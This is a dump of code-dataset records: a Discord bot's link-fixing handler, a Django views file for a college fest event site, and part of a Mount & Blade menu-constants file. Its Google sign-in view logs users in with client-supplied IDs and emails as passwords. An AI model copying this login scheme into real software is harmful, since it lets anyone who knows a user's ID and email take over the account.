url.replace('runescape.wikia.com/wiki/', 'runescape.wiki/w/')\n formatted_urls.append(url)\n\n formatted_urls_string = ''\n for url in formatted_urls:\n formatted_urls_string += f'- ***<{url}>***\\n\\n'\n plural = ''\n if len(formatted_urls) > 1:\n plural = 's'\n await message.channel.send(f'Olá, parece que você usou um ou mais links para a antiga Wiki do RuneScape!'\n f'\\n\\n'\n f'Recentemente os Admins da Wiki, com ajuda da Jagex, '\n f'passou a hostear a wiki do jogo no site oficial do RuneScape, ao '\n f'invés do{plural} link{plural} que você enviou, utilize o{plural} link{plural} abaixo:\\n\\n'\n f'{formatted_urls_string}'\n f'Ajude-nos a fazer a nova wiki ser conhecida por todos :)')\n # If in development environment only accept answers from myself\n await self.process_commands(message)\n\n async def 
on_message_edit(self, before, after):\n if after.author.bot:\n return\n await self.process_commands(after)\n\n\nif __name__ == '__main__':\n logger = logging.getLogger('discord')\n logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\n handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\n logger.addHandler(handler)\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run())\n","sub_path":"rs3clansbot.py","file_name":"rs3clansbot.py","file_ext":"py","file_size_in_byte":14247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"364568231","text":"from django.shortcuts import render,HttpResponse,get_object_or_404\nfrom django.contrib import admin,auth\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.shortcuts import redirect\n#from .forms import ProfileForm\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.dispatch import receiver\nfrom django.contrib.auth import login,authenticate\nfrom app.models import UserProfile,Event,UserToken,Registration,EventRules,RegistrationManagement,RatingModel,UserRated\nimport random\nfrom django.http import JsonResponse\nimport itertools\n\n# Create your views here.\ndef home(request):\n eventa=Event.objects.all()\n events=[]\n single=['marketing_roadies','buffet_money','placement_fever']\n eee=['Sherlocked','Pubg','Roadies','Treasure Hunt','Auction Villa','Cs Go','Placement Fever','Lazer Maze','Robo Soccer','Bull Stock 2.0','Codee','Technovation','Aaviskar','Guest Lecture']\n rankers=UserProfile.objects.order_by('-coins')[:20]\n ranks=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]\n rankersprofile=[]\n for i in rankers:\n rankersprofile.append(i)\n for ev in eventa:\n events.append(ev.name)\n print(ev.eventrules.about)\n\n if request.user.is_authenticated:\n rl=[]\n events=[]\n try:\n e=UserProfile.objects.filter(user=request.user).count()\n except UserProfile.DoesNotExist:\n UserProfile.objects.create(user=request.user)\n u=UserProfile.objects.get(user=request.user)\n try:\n f=UserRated.objects.filter(user=request.user).count()\n print(e)\n except UserRated.DoesNotExist:\n UserRated.objects.create(user=request.user)\n try:\n g=UserToken.objects.filter(user=request.user).count()\n except UserToken.DoesNotExist:\n UserToken.objects.create(user=request.user)\n if e==0:\n UserProfile.objects.create(user=request.user)\n if f==0:\n UserRated.objects.create(user=request.user)\n if g==0:\n UserToken.objects.create(user=request.user)\n t=UserToken.objects.get(user=request.user)\n tt=UserRated.objects.get(user=request.user)\n tokens=[]\n tokens.append(t.sherlocked),events.append('sherlocked'),tokens.append(t.pubg),events.append('pubg'),tokens.append(t.marketing_roadies),events.append('marketing_roadies'),tokens.append(t.treasure_hunt),events.append('treasure_hunt'),tokens.append(t.auction_villa),events.append('auction_villa'),tokens.append(t.cs_go),events.append('cs_go'),tokens.append(t.placement_fever),events.append('placement_fever')\n 
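# note: tokens[i] is built to pair with events[i]; the zip(events, tokens, eventa, rl, eee) below relies on that ordering\n        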
tokens.append(t.lazer_maze),events.append('lazer_maze'),tokens.append(t.robo_soccer),events.append('robo_soccer'),tokens.append(t.buffet_money),events.append('buffet_money'),tokens.append(t.codee),events.append('codee'),tokens.append(t.technovation),events.append('technovation'),tokens.append(t.aaviskar),events.append('aaviskar'),tokens.append(t.guest_lecture),events.append('guest_lecture')\n rl.append(tt.sherlocked),rl.append(tt.pubg),rl.append(tt.marketing_roadies),rl.append(tt.treasure_hunt),rl.append(tt.auction_villa),rl.append(tt.cs_go),rl.append(tt.placement_fever)\n rl.append(tt.lazer_maze),rl.append(tt.robo_soccer),rl.append(tt.buffet_money),rl.append(tt.codee),rl.append(tt.technovation),rl.append(tt.aaviskar),rl.append(tt.guest_lecture)\n #print(tokens)\n #print(events)\n coin=u.coins\n rp=UserProfile.objects.order_by('-coins')\n ru=0\n for x in rp:\n ru=ru+1\n if x.admission==request.user.userprofile.admission:\n break\n mylist=zip(events,tokens,eventa,rl,eee)\n rppp=zip(rankersprofile,ranks)\n args={'coin':coin,'mylist':mylist,'single':single,'eventa':eventa,'ru':ru,'rppp':rppp}\n return render(request,'myapp/events.html',args)\n tokens=[5,5,5,5,5,5,5,5,5,5,5,5,5,5]\n rl=[5,5,5,5,5,5,5,5,5,5,5,5,5,5]\n mylist=zip(events,tokens,eventa,rl,eee)\n rppp=zip(rankersprofile,ranks)\n args={'mylist':mylist,'single':single,'eventa':eventa,'rppp':rppp}\n return render(request,'myapp/events.html',args)\n\ndef register(request):\n if request.method == 'POST':\n print('process initiated')\n name=request.POST.get('id_name')\n username=request.POST.get('id_username')\n imageurl=request.POST.get('imageaurl')\n branch=request.POST.get('id_branch')\n email=request.POST.get('id_email')\n phone=request.POST.get('id_phone')\n y=UserProfile.objects.get(user=request.user)\n y.name=name\n y.phone=phone\n y.branch=branch\n y.email=email\n y.admission=username\n y.imageurl=imageurl\n y.save()\n print(name,email,imageurl)\n return HttpResponse('Success')\n@login_required\ndef profile(request):\n user=request.user\n p=UserProfile.objects.get(user=user)\n args={'p':p}\n if request.method==\"POST\":\n name=request.POST.get('id_name')\n username=request.POST.get('id_admission')\n #imageurl=request.POST.get('imageaurl')\n branch=request.POST.get('id_branch')\n phone=request.POST.get('id_phone')\n print(name,username,phone,branch)\n print('saving data')\n y=UserProfile.objects.get(user=request.user)\n y.name=name\n y.phone=phone\n y.branch=branch\n y.admission=username\n #y.imageurl=imageurl\n y.save()\n return redirect('/web/')\n return render(request,'myapp/profile.html',args)\n\ndef loginu(request):\n username=request.POST.get('username')\n password=request.POST.get('id_password')\n\n print('initiated')\n user=authenticate(username=username,password=password)\n if user is None:\n return HttpResponse('Wrong')\n print(user)\n login(request,user)\n return HttpResponse('Success')\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/web/')\n\ndef eventregister(request):\n team_name=request.POST.get('team_name')\n team_name=str(team_name)\n ad=request.POST.get('adm')\n event=request.POST.get('event')\n event=str(event)\n print(ad,team_name,event)\n print(event)\n if team_name == \"\":\n return HttpResponse('null')\n\n try:\n e=RegistrationManagement.objects.get(team_name=team_name,current_event=event).members.count()\n except RegistrationManagement.DoesNotExist:\n e=None\n print(e)\n #return Response({'message':'Testing passed'})\n if ad == 'none':\n try:\n 
e=RegistrationManagement.objects.get(team_name=team_name,current_event=event).members.count()\n except RegistrationManagement.DoesNotExist:\n e=None\n if e is None:\n return HttpResponse('Registration has been closed')\n y=UserProfile.objects.get(user=request.user)\n RegistrationManagement.create_team(event,team_name,request.user,y.admission,y.phone,event)\n else:\n return HttpResponse('Already')\n elif team_name!='none' :\n #RegistrationManagement.join_team(request.user,team_name)\n if e is None:\n return HttpResponse('Registration has been closed')\n #return HttpResponse('ncreated')\n elif e<5:\n RegistrationManagement.join_team(event,team_name,request.user)\n else :\n return HttpResponse('Full')\n elif team_name=='none':\n return HttpResponse('Registration has been closed')\n\n x=random.randint(999,99999)*67\n events=Event.objects.all()\n regi=UserToken.objects.get(user=request.user)\n event=str(event)\n if event=='aaviskar':\n regi.aaviskar=x\n if event=='technovation':\n regi.technovation=x\n if event=='codee':\n regi.codee=x\n if event=='pubg':\n regi.pubg=x\n if event=='sherlocked':\n regi.sherlocked=x\n if event=='marketing_roadies':\n regi.marketing_roadies=x\n if event=='treasure_hunt':\n regi.treasure_hunt=x\n if event=='auction_villa':\n regi.auction_villa=x\n if event=='cs_go':\n regi.cs_go=x\n if event=='placement_fever':\n regi.placement_fever=x\n if event=='laser_maze':\n regi.lazer_maze=x\n if event=='robo_soccer':\n regi.robo_soccer=x\n if event=='buffet_money':\n regi.buffet_money=x\n if event=='guest_lecture':\n regi.guest_lecture=x\n\n regi.save()\n adm=UserProfile.objects.get(user=request.user)\n Registration.objects.create(event=event,team_name=team_name,admission=adm,token=x)\n return HttpResponse('Success')\n\ndef verify(request):\n event=request.POST.get('event')\n coupon=request.POST.get('coupon')\n print(coupon,event,request.user)\n if event=='pubg':\n x=request.user.usertoken.pubg\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.pubg='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='sherlocked':\n x=request.user.usertoken.sherlocked\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.sherlocked='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='marketing_roadies':\n x=request.user.usertoken.marketing_roadies\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.marketing_roadies='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='treasure_hunt':\n x=request.user.usertoken.treasure_hunt\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.treasure_hunt='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='auction_villa':\n x=request.user.usertoken.auction_villa\n print(coupon)\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.auction_villa='1'\n t.save()\n return HttpResponse('Success')\n else:\n 
return HttpResponse('Wrong')\n\n elif event=='cs_go':\n x=request.user.usertoken.cs_go\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.cs_go='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='placement_fever':\n x=request.user.usertoken.placement_fever\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.placement_fever='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='laser_maze':\n x=request.user.usertoken.lazer_maze\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.lazer_maze='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='robo_soccer':\n x=request.user.usertoken.robo_soccer\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.robo_soccer='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='buffet_money':\n x=request.user.usertoken.buffet_money\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.buffet_money='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='codee':\n x=request.user.usertoken.codee\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.codee='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='technovation':\n x=request.user.usertoken.technovation\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.technovation='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='aaviskar':\n x=request.user.usertoken.aaviskar\n print(x)\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.aaviskar='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='guest_lecture':\n x=request.user.usertoken.guest_lecture\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.guest_lecture='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n else :\n return HttpResponse('Invalid event')\n\ndef rating(request):\n event=request.POST.get('event')\n rvalue=request.POST.get('rvalue')\n rvalue=int(rvalue)\n print(rvalue,event)\n try:\n e=RatingModel.objects.get(event=event)\n except RatingModel.DoesNotExist:\n e=None\n RatingModel.objects.create(event=event)\n t=RatingModel.objects.get(event=event)\n x=float(t.average_rating)\n y=int(t.number_of_rates)\n x=str((x*y+rvalue)/(y+1))\n y=str(y+1)\n t.average_rating=x\n t.number_of_rates=y\n t.save()\n try:\n 
e=UserRated.objects.get(user=request.user)\n except UserRated.DoesNotExist:\n e=None\n UserRated.objects.create(user=request.user)\n regi=UserRated.objects.get(user=request.user)\n x=str(rvalue)\n if event=='aaviskar':\n regi.aaviskar=x\n if event=='technovation':\n regi.technovation=x\n if event=='codee':\n regi.codee=x\n if event=='pubg':\n regi.pubg=x\n if event=='sherlocked':\n regi.sherlocked=x\n if event=='marketing_roadies':\n regi.marketing_roadies=x\n if event=='treasure_hunt':\n regi.treasure_hunt=x\n if event=='auction_villa':\n regi.auction_villa=x\n if event=='cs_go':\n regi.cs_go=x\n if event=='placement_fever':\n regi.placement_fever=x\n if event=='laser_maze':\n regi.lazer_maze=x\n if event=='robo_soccer':\n regi.robo_soccer=x\n if event=='buffet_money':\n regi.buffet_money=x\n if event=='guest_lecture':\n regi.guest_lecture=x\n regi.save()\n\n return HttpResponse('Success')\n\ndef googleSignin(request):\n print('googlesignin initiated')\n name=request.POST.get('name')\n ids=request.POST.get('id')\n imageurl=request.POST.get('imageurl')\n email=request.POST.get('email')\n print(ids,name,imageurl,email)\n user=authenticate(username=ids,password=email)\n if user is None:\n user = User.objects.create_user(username=ids, password=email, email=email)\n user.save()\n login(request,user)\n y=UserProfile.objects.get(user=request.user)\n y.name=name\n #y.phone=phone\n #y.branch=branch\n y.email=email\n #y.admission=username\n y.imageurl=imageurl\n y.save()\n return HttpResponse('Registered')\n else:\n print(user)\n login(request,user)\n yy=UserProfile.objects.filter(user=request.user).count()\n if yy==0:\n UserProfile.objects.create(user=request.user)\n y=UserProfile.objects.get(user=request.user)\n y.name=name\n #y.phone=phone\n #y.branch=branch\n y.email=email\n #y.admission=username\n y.imageurl=imageurl\n y.save()\n return HttpResponse('Success')\n\n","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"301112351","text":"menu_start_game_options = 0\nmenu_start_phase_2 = 1\nmenu_start_game_3 = 2\nmenu_tutorial = 3\nmenu_reports = 4\nmenu_custom_battle_scene = 5\nmenu_custom_battle_end = 6\nmenu_start_game_0 = 7\nmenu_start_game_1 = 8\nmenu_start_character_1 = 9\nmenu_start_character_2 = 10\nmenu_start_character_3 = 11\nmenu_start_character_4 = 12\nmenu_choose_skill = 13\nmenu_banner_selection_for_noble = 14\nmenu_past_life_explanation = 15\nmenu_auto_return = 16\nmenu_morale_report = 17\nmenu_courtship_relations = 18\nmenu_lord_relations = 19\nmenu_companion_report = 20\nmenu_faction_orders = 21\nmenu_character_report = 22\nmenu_party_size_report = 23\nmenu_player_class = 24\nmenu_faction_relations_report = 25\nmenu_other_relations_report = 26\nmenu_camp = 27\nmenu_camp_special_ability = 28\nmenu_camp_special_ability_extra = 29\nmenu_camp_special_ability_passive = 30\nmenu_inspect_camp = 31\nmenu_camp_cheat = 32\nmenu_camp_cheat_2 = 33\nmenu_cheat_find_item = 34\nmenu_cheat_find_item_2 = 35\nmenu_camp_action = 36\nmenu_export_import_npcs = 37\nmenu_export_import_npcs_2 = 38\nmenu_camp_recruit_prisoners = 39\nmenu_camp_no_prisoners = 40\nmenu_camp_action_read_book = 41\nmenu_camp_action_read_book_start = 42\nmenu_retirement_verify = 43\nmenu_end_game = 44\nmenu_cattle_herd = 45\nmenu_cattle_herd_kill = 46\nmenu_cattle_herd_kill_end = 47\nmenu_arena_duel_fight = 48\nmenu_arena_duel_conclusion = 49\nmenu_simple_encounter = 
50\nmenu_encounter_retreat_confirm = 51\nmenu_encounter_retreat = 52\nmenu_order_attack_begin = 53\nmenu_order_attack_2 = 54\nmenu_battle_debrief = 55\nmenu_freelancer_escape = 56\nmenu_total_victory = 57\nmenu_enemy_slipped_away = 58\nmenu_total_defeat = 59\nmenu_permanent_damage = 60\nmenu_pre_join = 61\nmenu_join_battle = 62\nmenu_join_order_attack = 63\nmenu_zendar = 64\nmenu_salt_mine = 65\nmenu_four_ways_inn = 66\nmenu_test_scene = 67\nmenu_battlefields = 68\nmenu_dhorak_keep = 69\nmenu_join_siege_outside = 70\nmenu_cut_siege_without_fight = 71\nmenu_besiegers_camp_with_allies = 72\nmenu_castle_outside = 73\nmenu_castle_guard = 74\nmenu_castle_entry_granted = 75\nmenu_castle_entry_denied = 76\nmenu_castle_meeting = 77\nmenu_castle_meeting_selected = 78\nmenu_castle_entry_refused = 79\nmenu_castle_entry_refused_accepted = 80\nmenu_castle_besiege = 81\nmenu_siege_attack_meets_sally = 82\nmenu_castle_besiege_inner_battle = 83\nmenu_construct_ladders = 84\nmenu_construct_siege_tower = 85\nmenu_castle_attack_walls_simulate = 86\nmenu_castle_attack_walls_with_allies_simulate = 87\nmenu_castle_taken_by_friends = 88\nmenu_castle_taken = 89\nmenu_castle_taken_2 = 90\nmenu_requested_castle_granted_to_player = 91\nmenu_requested_castle_granted_to_player_husband = 92\nmenu_requested_castle_granted_to_another = 93\nmenu_requested_castle_granted_to_another_female = 94\nmenu_leave_faction_2 = 95\nmenu_leave_faction = 96\nmenu_give_center_to_player = 97\nmenu_give_center_to_player_2 = 98\nmenu_oath_fulfilled = 99\nmenu_siege_started_defender = 100\nmenu_siege_join_defense = 101\nmenu_enter_your_own_castle = 102\nmenu_village = 103\nmenu_village_supplies = 104\nmenu_village_hostile_action = 105\nmenu_recruit_volunteers = 106\nmenu_town_recruit_volunteers = 107\nmenu_regular_recruit = 108\nmenu_center_build_order = 109\nmenu_village_hunt_down_fugitive_defeated = 110\nmenu_village_infest_bandits_result = 111\nmenu_village_infestation_removed = 112\nmenu_center_manage_advance = 113\nmenu_center_improve_advance = 114\nmenu_center_manage = 115\nmenu_center_improve = 116\nmenu_town_bandits_failed = 117\nmenu_town_bandits_succeeded = 118\nmenu_town_bandits_succeeded2 = 119\nmenu_town_bandits_succeeded3 = 120\nmenu_credit_fight_failed = 121\nmenu_credit_fight_succeeded = 122\nmenu_village_steal_cattle_confirm = 123\nmenu_village_steal_cattle = 124\nmenu_village_take_food_confirm = 125\nmenu_village_take_food = 126\nmenu_village_start_attack = 127\nmenu_village_loot_no_resist = 128\nmenu_village_loot_complete = 129\nmenu_village_loot_defeat = 130\nmenu_village_loot_continue = 131\nmenu_close = 132\nmenu_town = 133\nmenu_go_to_settlements = 134\nmenu_go_somewhere = 135\nmenu_trophy_trade_2 = 136\nmenu_enter_blacksmith = 137\nmenu_cannot_enter_blacksmith = 138\nmenu_cannot_enter_blacksmith_low = 139\nmenu_cannot_enter_court = 140\nmenu_lady_visit = 141\nmenu_town_tournament_start_new = 142\nmenu_town_tournament_lost = 143\nmenu_town_tournament_won = 144\nmenu_town_tournament_won_by_another = 145\nmenu_town_tournament = 146\nmenu_tournament_withdraw_verify = 147\nmenu_tournament_bet = 148\nmenu_tournament_bet_confirm = 149\nmenu_tournament_participants = 150\nmenu_collect_taxes = 151\nmenu_collect_taxes_complete = 152\nmenu_collect_taxes_rebels_killed = 153\nmenu_collect_taxes_failed = 154\nmenu_collect_taxes_revolt_warning = 155\nmenu_collect_taxes_revolt = 156\nmenu_train_peasants_against_bandits = 157\nmenu_train_peasants_against_bandits_ready = 158\nmenu_train_peasants_against_bandits_training_result = 
159\nmenu_train_peasants_against_bandits_attack = 160\nmenu_train_peasants_against_bandits_attack_result = 161\nmenu_train_peasants_against_bandits_success = 162\nmenu_disembark = 163\nmenu_ship_reembark = 164\nmenu_center_reports = 165\nmenu_price_and_production = 166\nmenu_town_trade = 167\nmenu_town_trade_assessment_begin = 168\nmenu_town_trade_assessment = 169\nmenu_sneak_into_town_suceeded = 170\nmenu_sneak_into_town_caught = 171\nmenu_sneak_into_town_caught_dispersed_guards = 172\nmenu_sneak_into_town_caught_ran_away = 173\nmenu_enemy_offer_ransom_for_prisoner = 174\nmenu_training_ground = 175\nmenu_training_ground_selection_details_melee_1 = 176\nmenu_training_ground_selection_details_melee_2 = 177\nmenu_training_ground_selection_details_mounted = 178\nmenu_training_ground_selection_details_ranged_1 = 179\nmenu_training_ground_selection_details_ranged_2 = 180\nmenu_training_ground_description = 181\nmenu_training_ground_training_result = 182\nmenu_marshall_selection_candidate_ask = 183\nmenu_captivity_avoid_wilderness = 184\nmenu_captivity_start_wilderness = 185\nmenu_captivity_start_wilderness_surrender = 186\nmenu_captivity_start_wilderness_defeat = 187\nmenu_captivity_start_castle_surrender = 188\nmenu_captivity_start_castle_defeat = 189\nmenu_captivity_start_under_siege_defeat = 190\nmenu_captivity_wilderness_taken_prisoner = 191\nmenu_captivity_wilderness_check = 192\nmenu_captivity_end_wilderness_escape = 193\nmenu_captivity_castle_taken_prisoner = 194\nmenu_captivity_rescue_lord_taken_prisoner = 195\nmenu_captivity_castle_check = 196\nmenu_captivity_end_exchanged_with_prisoner = 197\nmenu_captivity_end_propose_ransom = 198\nmenu_captivity_castle_remain = 199\nmenu_kingdom_army_quest_report_to_army = 200\nmenu_kingdom_army_quest_messenger = 201\nmenu_kingdom_army_quest_join_siege_order = 202\nmenu_kingdom_army_follow_failed = 203\nmenu_invite_player_to_faction_without_center = 204\nmenu_invite_player_to_faction = 205\nmenu_invite_player_to_faction_accepted = 206\nmenu_question_peace_offer = 207\nmenu_notification_truce_expired = 208\nmenu_notification_feast_quest_expired = 209\nmenu_notification_sortie_possible = 210\nmenu_notification_casus_belli_expired = 211\nmenu_notification_lord_defects = 212\nmenu_notification_treason_indictment = 213\nmenu_notification_border_incident = 214\nmenu_notification_player_faction_active = 215\nmenu_minister_confirm = 216\nmenu_notification_court_lost = 217\nmenu_notification_player_faction_deactive = 218\nmenu_notification_player_wedding_day = 219\nmenu_notification_player_kingdom_holds_feast = 220\nmenu_notification_center_under_siege = 221\nmenu_notification_center_under_siege_special = 222\nmenu_notification_village_raided = 223\nmenu_notification_village_raid_started = 224\nmenu_notification_one_faction_left = 225\nmenu_notification_oath_renounced_faction_defeated = 226\nmenu_notification_center_lost = 227\nmenu_notification_center_sacked = 228\nmenu_notification_troop_left_players_faction = 229\nmenu_notification_troop_joined_players_faction = 230\nmenu_notification_war_declared = 231\nmenu_notification_peace_declared = 232\nmenu_notification_faction_defeated = 233\nmenu_notification_kingdom_restoration = 234\nmenu_notification_rebels_switched_to_faction = 235\nmenu_notification_player_should_consult = 236\nmenu_notification_player_feast_in_progress = 237\nmenu_notification_lady_requests_visit = 238\nmenu_garden = 239\nmenu_kill_local_merchant_begin = 240\nmenu_debug_alert_from_s65 = 241\nmenu_auto_return_to_map = 242\nmenu_bandit_lair 
= 243\nmenu_notification_player_faction_political_issue_resolved = 244\nmenu_notification_player_faction_political_issue_resolved_for_player = 245\nmenu_start_phase_2_5 = 246\nmenu_start_king = 247\nmenu_start_knight = 248\nmenu_start_phase_3 = 249\nmenu_start_phase_4 = 250\nmenu_lost_tavern_duel = 251\nmenu_establish_court = 252\nmenu_notification_relieved_as_marshal = 253\nmenu_manage_loot_pool = 254\nmenu_auto_loot = 255\nmenu_auto_loot_item_pools = 256\nmenu_donate = 257\nmenu_blacksmith = 258\nmenu_blacksmith_item_high = 259\nmenu_blacksmith2 = 260\nmenu_blacksmith_item_low = 261\nmenu_blacksmith2_low = 262\nmenu_dplmc_notification_alliance_declared = 263\nmenu_dplmc_notification_defensive_declared = 264\nmenu_dplmc_notification_trade_declared = 265\nmenu_dplmc_notification_nonaggression_declared = 266\nmenu_dplmc_question_alliance_offer = 267\nmenu_dplmc_question_defensive_offer = 268\nmenu_dplmc_question_trade_offer = 269\nmenu_dplmc_question_nonaggression_offer = 270\nmenu_dplmc_notification_alliance_expired = 271\nmenu_dplmc_notification_defensive_expired = 272\nmenu_dplmc_notification_trade_expired = 273\nmenu_dplmc_dictate_terms = 274\nmenu_dplmc_deny_terms = 275\nmenu_dplmc_village_riot_result = 276\nmenu_dplmc_village_riot_removed = 277\nmenu_dplmc_town_riot_removed = 278\nmenu_dplmc_riot_negotiate = 279\nmenu_dplmc_notification_riot = 280\nmenu_dplmc_notification_appoint_chamberlain = 281\nmenu_dplmc_chamberlain_confirm = 282\nmenu_dplmc_notification_appoint_constable = 283\nmenu_dplmc_constable_confirm = 284\nmenu_dplmc_notification_appoint_chancellor = 285\nmenu_dplmc_chancellor_confirm = 286\nmenu_dplmc_deserters = 287\nmenu_dplmc_negotiate_besieger = 288\nmenu_dplmc_messenger = 289\nmenu_dplmc_scout = 290\nmenu_dplmc_domestic_policy = 291\nmenu_dplmc_affiliate_end = 292\nmenu_choose_options_1 = 293\nmenu_choose_options_2 = 294\nmenu_choose_options_3 = 295\nmenu_choose_options_end = 296\nmenu_game_mode = 297\nmenu_town_menu_cheats = 298\nmenu_bank = 299\nmenu_borrow_money = 300\nmenu_banks_report = 301\nmenu_new_kingdom_restoration = 302\nmenu_intrusion_alarm = 303\nmenu_world_map_soldier = 304\nmenu_meet_the_doctor = 305\nmenu_commander_aud = 306\nmenu_ask_revolt = 307\nmenu_revolt = 308\nmenu_ask_desert = 309\nmenu_desert = 310\nmenu_ask_retire = 311\nmenu_freelance_camp = 312\nmenu_trophy_trade = 313\nmenu_contribution_trophy = 314\nmenu_upgrade_path = 315\nmenu_upgrade_path_knight = 316\nmenu_freelancer_train_player_1 = 317\nmenu_freelancer_train_player_2 = 318\nmenu_freelancer_train_player_win = 319\nmenu_freelancer_train_player_lose = 320\nmenu_oim_rich_visitor = 321\nmenu_oim_rich_visitor_result = 322\nmenu_oim_rich_visitor_meal = 323\nmenu_world_map_precision = 324\nmenu_battlefield_size = 325\nmenu_necromancy = 326\nmenu_necro_create_undead_weak = 327\nmenu_necro_create_undead = 328\nmenu_necro_create_item = 329\nmenu_necro_create_troop = 330\nmenu_necro_sg = 331\nmenu_camp_manage_gems = 332\nmenu_next_rank_notify = 333\nmenu_camp_set_special_ability = 334\nmenu_camp_manage_item = 335\nmenu_adventure_object = 336\nmenu_adventure_object_1 = 337\nmenu_camp_hunting_or_poaching = 338\nmenu_poaching = 339\nmenu_hunting = 340\nmenu_hunting_2 = 341\nmenu_after_hunt = 342\nmenu_choose_scenes_0 = 343\nmenu_choose_scenes_13 = 344\nmenu_choose_scenes_26 = 345\nmenu_choose_scenes_39 = 346\nmenu_choose_scenes_52 = 347\nmenu_choose_scenes_65 = 348\nmenu_choose_scenes_78 = 349\nmenu_choose_scenes_91 = 350\nmenu_choose_scenes_104 = 351\nmenu_choose_scenes_117 = 
352\nmenu_choose_scenes_130 = 353\nmenu_choose_scenes_143 = 354\nmenu_choose_scenes_156 = 355\nmenu_choose_scenes_169 = 356\nmenu_choose_scenes_182 = 357\nmenu_choose_scenes_195 = 358\nmenu_choose_scenes_208 = 359\nmenu_choose_scenes_221 = 360\nmenu_choose_scenes_234 = 361\nmenu_choose_scenes_247 = 362\nmenu_choose_scenes_260 = 363\nmenu_choose_scenes_273 = 364\nmenu_choose_scenes_286 = 365\nmenu_choose_scenes_299 = 366\nmenu_choose_scenes_312 = 367\nmenu_choose_scenes_325 = 368\nmenu_choose_scenes_338 = 369\nmenu_choose_scenes_351 = 370\nmenu_choose_scenes_364 = 371\nmenu_choose_scenes_377 = 372\nmenu_choose_scenes_390 = 373\nmenu_choose_scenes_403 = 374\nmenu_choose_scenes_416 = 375\nmenu_choose_scenes_429 = 376\nmenu_choose_scenes_442 = 377\nmenu_choose_scenes_455 = 378\nmenu_choose_scenes_468 = 379\nmenu_choose_scenes_481 = 380\nmenu_choose_scenes_494 = 381\nmenu_choose_scenes_507 = 382\nmenu_choose_scenes_520 = 383\nmenu_choose_scenes_533 = 384\nmenu_choose_scenes_546 = 385\nmenu_choose_scenes_559 = 386\nmenu_choose_scenes_572 = 387\nmenu_choose_scenes_585 = 388\nmenu_choose_scenes_598 = 389\nmenu_choose_scenes_611 = 390\nmenu_choose_scenes_624 = 391\nmenu_choose_scenes_637 = 392\nmenu_choose_scenes_650 = 393\nmenu_choose_scenes_663 = 394\nmenu_choose_scenes_676 = 395\nmenu_choose_scenes_689 = 396\nmenu_choose_scenes_702 = 